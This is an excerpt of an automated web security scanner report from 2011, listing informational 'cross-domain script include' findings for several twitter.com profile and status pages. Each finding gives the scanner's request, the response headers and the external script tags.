<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.348. http://twitter.com/Michael_Joseph/status/30790097846673409

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Michael_Joseph/status/30790097846673409

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Michael_Joseph/status/30790097846673409 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224913-82080-4832
ETag: "f4090043902b6e990964220437113fcc"
Last-Modified: Fri, 28 Jan 2011 14:28:33 GMT
X-Runtime: 0.05956
Content-Type: text/html; charset=utf-8
Content-Length: 14049
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwNzkwMDk3ODQ2NjczNDA5Ogxjc3JmX2lkIiU0ZTYz%250AMTFjMGI1MGExOTQ1ZDU1ZTJiMzY3YmViYjhmZDoHaWQiJTFjOTUzNDgxYTQy%250AZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0%250AbCsIM07wzC0B--3f3d222c37991f7c56cd273e7db3127271465e45; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.349. http://twitter.com/MittRomney

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /MittRomney

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /MittRomney HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265282-38547-52668
ETag: "3107c6cc6c6978ff3b7722cbf52c2af6"
Last-Modified: Sat, 29 Jan 2011 01:41:22 GMT
X-Runtime: 0.00731
Content-Type: text/html; charset=utf-8
Content-Length: 46527
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--a144f2d48721ec13cc6db17b0167bf7e0dce4447; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.350. http://twitter.com/NewYorkPost

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /NewYorkPost

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /NewYorkPost HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:13 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265993-27588-50087
ETag: "e773df2d3a6b90bf31143c56a9f20c5d"
Last-Modified: Sat, 29 Jan 2011 01:53:13 GMT
X-Runtime: 0.01729
Content-Type: text/html; charset=utf-8
Content-Length: 53629
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/twitter.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296248415" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296248415" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/geov1.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/api.js?1296248415" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/dismissable.js?1296248415" type="text/javascript"></script>
...[SNIP]...

18.351. http://twitter.com/Nicole_114

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Nicole_114

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Nicole_114 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265973-31870-20101
ETag: "259b5389cc01f15bd18d06cca5332bd4"
Last-Modified: Sat, 29 Jan 2011 01:52:53 GMT
X-Runtime: 0.01243
Content-Type: text/html; charset=utf-8
Content-Length: 47429
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534" type="text/javascript"></script>
...[SNIP]...

18.352. http://twitter.com/Oprah

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Oprah

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Oprah HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266030-46156-5686
ETag: "857c98a5094f6af87e0d30eae77b7c6f"
Last-Modified: Sat, 29 Jan 2011 01:53:50 GMT
X-Runtime: 0.01844
Content-Type: text/html; charset=utf-8
Content-Length: 42735
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534" type="text/javascript"></script>
...[SNIP]...

18.353. http://twitter.com/PageLines

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /PageLines

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /PageLines HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:04 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225004-17515-51236
ETag: "24c45e2f38e6ae478c4805af9b36ff8e"
Last-Modified: Fri, 28 Jan 2011 14:30:04 GMT
X-Runtime: 0.01227
Content-Type: text/html; charset=utf-8
Content-Length: 51190
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.354. http://twitter.com/PageLines/status/27898822361354240

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /PageLines/status/27898822361354240

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /PageLines/status/27898822361354240 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:07 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225006-58314-38201
ETag: "57ff1e9c73248c6fb8e8d467c82b1909"
Last-Modified: Fri, 28 Jan 2011 14:30:06 GMT
X-Runtime: 0.07512
Content-Type: text/html; charset=utf-8
Content-Length: 13712
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vUGFnZUxpbmVz%250AL3N0YXR1cy8yNzg5ODgyMjM2MTM1NDI0MDoMY3NyZl9pZCIlMzc4NTRjMzAw%250AODE3YjBiNmI1MTM5ZjdiNDE2M2E1ZmU6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--8f776230b304f1b0fa1fdaa92cad95b801a77055; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.355. http://twitter.com/PageLines/status/27898822361354240

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /PageLines/status/27898822361354240

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /PageLines/status/27898822361354240 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225141-56344-8865
ETag: "9317a5862e354c20c34c5529b8543f1d"
Last-Modified: Fri, 28 Jan 2011 14:32:21 GMT
X-Runtime: 0.08587
Content-Type: text/html; charset=utf-8
Content-Length: 13711
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
